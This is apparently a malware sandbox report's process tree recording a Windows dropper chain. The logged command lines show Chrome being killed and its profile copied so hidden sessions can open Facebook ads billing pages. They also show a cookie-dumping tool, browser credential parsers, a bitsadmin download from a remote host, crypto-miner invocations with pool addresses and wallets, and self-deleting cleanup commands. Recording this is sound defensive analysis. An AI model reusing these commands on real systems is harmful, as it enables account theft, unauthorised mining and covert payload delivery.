C:\Users\Admin\AppData\Local\Temp\prwnihee.fni\askinstall36.exeC:\Users\Admin\AppData\Local\Temp\prwnihee.fni\askinstall36.exe9⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe10⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe11⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y10⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/10⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ff87e8f4f50,0x7ff87e8f4f60,0x7ff87e8f4f7011⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1692,10096795762473748926,17044679151280545239,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1724 /prefetch:811⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1692,10096795762473748926,17044679151280545239,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1696 /prefetch:211⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1692,10096795762473748926,17044679151280545239,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2160 /prefetch:811⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1692,10096795762473748926,17044679151280545239,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2872 /prefetch:111⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1692,10096795762473748926,17044679151280545239,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2852 /prefetch:111⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1692,10096795762473748926,17044679151280545239,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3584 /prefetch:111⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1692,10096795762473748926,17044679151280545239,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:111⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1692,10096795762473748926,17044679151280545239,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:111⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1692,10096795762473748926,17044679151280545239,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3840 /prefetch:111⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1692,10096795762473748926,17044679151280545239,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4704 /prefetch:111⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1692,10096795762473748926,17044679151280545239,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=3920 /prefetch:211⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1692,10096795762473748926,17044679151280545239,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2356 /prefetch:811⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1692,10096795762473748926,17044679151280545239,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=3836 /prefetch:811⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1692,10096795762473748926,17044679151280545239,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=3812 /prefetch:811⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1692,10096795762473748926,17044679151280545239,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5524 /prefetch:811⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dowwonzm.qjb\KiffApp2.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\dowwonzm.qjb\KiffApp2.exeC:\Users\Admin\AppData\Local\Temp\dowwonzm.qjb\KiffApp2.exe9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l3pwh5fc.uml\y1.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\l3pwh5fc.uml\y1.exeC:\Users\Admin\AppData\Local\Temp\l3pwh5fc.uml\y1.exe9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qedgotxg.hvl\YDDWTFTMJU.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\qedgotxg.hvl\YDDWTFTMJU.exeC:\Users\Admin\AppData\Local\Temp\qedgotxg.hvl\YDDWTFTMJU.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4si5txbd.0dv\ABCbrowser.exe /VERYSILENT & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\4si5txbd.0dv\ABCbrowser.exeC:\Users\Admin\AppData\Local\Temp\4si5txbd.0dv\ABCbrowser.exe /VERYSILENT9⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe10⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ol44ycjp.25a\toolspab1.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\ol44ycjp.25a\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\ol44ycjp.25a\toolspab1.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\ol44ycjp.25a\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\ol44ycjp.25a\toolspab1.exe10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\miyqzfhx.0cg\inst.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\miyqzfhx.0cg\inst.exeC:\Users\Admin\AppData\Local\Temp\miyqzfhx.0cg\inst.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\eTjRbyJDwevVibLbXZ\ZLqkoMC:\Users\Admin\AppData\Local\Temp\eTjRbyJDwevVibLbXZ\ZLqkoM10⤵
-
C:\Users\Admin\AppData\Local\Temp\aEvYodoMRZrOXzRVeb\IXmSxkC:\Users\Admin\AppData\Local\Temp\aEvYodoMRZrOXzRVeb\IXmSxk11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wnnxwrxr.cuh\GcleanerWW.exe /mixone & exit8⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3rn3aatr.x3l\SunLabsPlayer.exe /S & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\3rn3aatr.x3l\SunLabsPlayer.exeC:\Users\Admin\AppData\Local\Temp\3rn3aatr.x3l\SunLabsPlayer.exe /S9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn100D.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn100D.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn100D.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn100D.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn100D.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn100D.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn100D.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z10⤵
- Download via BitsAdmin
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jg52vjjb.vda\app.exe /8-2222 & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\jg52vjjb.vda\app.exeC:\Users\Admin\AppData\Local\Temp\jg52vjjb.vda\app.exe /8-22229⤵
-
C:\Users\Admin\AppData\Local\Temp\jg52vjjb.vda\app.exe"C:\Users\Admin\AppData\Local\Temp\jg52vjjb.vda\app.exe" /8-222210⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\filee.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\filee.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\9892.tmp.exe"C:\Users\Admin\AppData\Roaming\9892.tmp.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\9892.tmp.exe"C:\Users\Admin\AppData\Roaming\9892.tmp.exe"6⤵
- Executes dropped EXE
- Checks processor information in registry
-
C:\Users\Admin\AppData\Roaming\9AF5.tmp.exe"C:\Users\Admin\AppData\Roaming\9AF5.tmp.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w16830@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w18113 --cpu-max-threads-hint 50 -r 99996⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\filee.exe"5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\jg6_6asg.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\jg6_6asg.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\kabo.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\kabo.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\kabo.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\kabo.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\IrecCH6.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\IrecCH6.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-63TFT.tmp\IrecCH6.tmp"C:\Users\Admin\AppData\Local\Temp\is-63TFT.tmp\IrecCH6.tmp" /SL5="$203FE,234767,151040,C:\Users\Admin\AppData\Local\Temp\RarSFX1\IrecCH6.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-3OPVB.tmp\player_record_48792.exe"C:\Users\Admin\AppData\Local\Temp\is-3OPVB.tmp\player_record_48792.exe" /S /UID=irecch66⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\Windows Media Player\QJTSBSPREI\irecord.exe"C:\Program Files\Windows Media Player\QJTSBSPREI\irecord.exe" /VERYSILENT7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-QNFM1.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-QNFM1.tmp\irecord.tmp" /SL5="$20500,6139911,56832,C:\Program Files\Windows Media Player\QJTSBSPREI\irecord.exe" /VERYSILENT8⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\recording\i-record.exe"C:\Program Files (x86)\recording\i-record.exe" -silent -desktopShortcut -programMenu9⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\36-588ec-863-10583-78a3a664388ad\Dywazhibyfa.exe"C:\Users\Admin\AppData\Local\Temp\36-588ec-863-10583-78a3a664388ad\Dywazhibyfa.exe"7⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\4d-4368e-aa4-c1fbd-a4ed795a84e9a\Maloxaeraeje.exe"C:\Users\Admin\AppData\Local\Temp\4d-4368e-aa4-c1fbd-a4ed795a84e9a\Maloxaeraeje.exe"7⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4sqj0c3d.gqv\gaoou.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\4sqj0c3d.gqv\gaoou.exeC:\Users\Admin\AppData\Local\Temp\4sqj0c3d.gqv\gaoou.exe9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt10⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt10⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt10⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rub4hiz1.hxz\google-game.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\rub4hiz1.hxz\google-game.exeC:\Users\Admin\AppData\Local\Temp\rub4hiz1.hxz\google-game.exe9⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install10⤵
- Loads dropped DLL
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pladm2gk.idx\md1_1eaf.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\pladm2gk.idx\md1_1eaf.exeC:\Users\Admin\AppData\Local\Temp\pladm2gk.idx\md1_1eaf.exe9⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nuyepqqs.kui\build.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\nuyepqqs.kui\build.exeC:\Users\Admin\AppData\Local\Temp\nuyepqqs.kui\build.exe9⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\nuyepqqs.kui\build.exe" & del C:\ProgramData\*.dll & exit10⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build.exe /f11⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 611⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nv0txl5d.iqq\askinstall36.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\nv0txl5d.iqq\askinstall36.exeC:\Users\Admin\AppData\Local\Temp\nv0txl5d.iqq\askinstall36.exe9⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe10⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe11⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y10⤵
- Enumerates system info in registry
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/10⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ff87ef74f50,0x7ff87ef74f60,0x7ff87ef74f7011⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1616,8509755890910517632,1434930214279510127,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1632 /prefetch:811⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kp3kiqme.2ye\KiffApp2.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\kp3kiqme.2ye\KiffApp2.exeC:\Users\Admin\AppData\Local\Temp\kp3kiqme.2ye\KiffApp2.exe9⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aaf2kbtg.5yf\y1.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\aaf2kbtg.5yf\y1.exeC:\Users\Admin\AppData\Local\Temp\aaf2kbtg.5yf\y1.exe9⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\aaf2kbtg.5yf\y1.exe"10⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK11⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\liaui0oq.cw1\GZWRMDJALF.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\liaui0oq.cw1\GZWRMDJALF.exeC:\Users\Admin\AppData\Local\Temp\liaui0oq.cw1\GZWRMDJALF.exe9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\main.exe"10⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\parse.exeparse.exe -f json -b edge11⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\parse.exeparse.exe -f json -b chrome11⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\parse.exeparse.exe -f json -b firefox11⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ftki0ocx.2an\ABCbrowser.exe /VERYSILENT & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\ftki0ocx.2an\ABCbrowser.exeC:\Users\Admin\AppData\Local\Temp\ftki0ocx.2an\ABCbrowser.exe /VERYSILENT9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kvukpg20.gnc\toolspab1.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\kvukpg20.gnc\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\kvukpg20.gnc\toolspab1.exe9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\kvukpg20.gnc\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\kvukpg20.gnc\toolspab1.exe10⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aqx2wssi.xwl\inst.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\aqx2wssi.xwl\inst.exeC:\Users\Admin\AppData\Local\Temp\aqx2wssi.xwl\inst.exe9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\DKjKfWelFENvessEpF\iWlalmC:\Users\Admin\AppData\Local\Temp\DKjKfWelFENvessEpF\iWlalm10⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\hHrieadHtMBygylAhq\VNrgBLC:\Users\Admin\AppData\Local\Temp\hHrieadHtMBygylAhq\VNrgBL11⤵
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pgyo3rys.mhj\GcleanerWW.exe /mixone & exit8⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pbfdcdl5.izh\SunLabsPlayer.exe /S & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\pbfdcdl5.izh\SunLabsPlayer.exeC:\Users\Admin\AppData\Local\Temp\pbfdcdl5.izh\SunLabsPlayer.exe /S9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxAC85.tmp\tempfile.ps1"10⤵
-
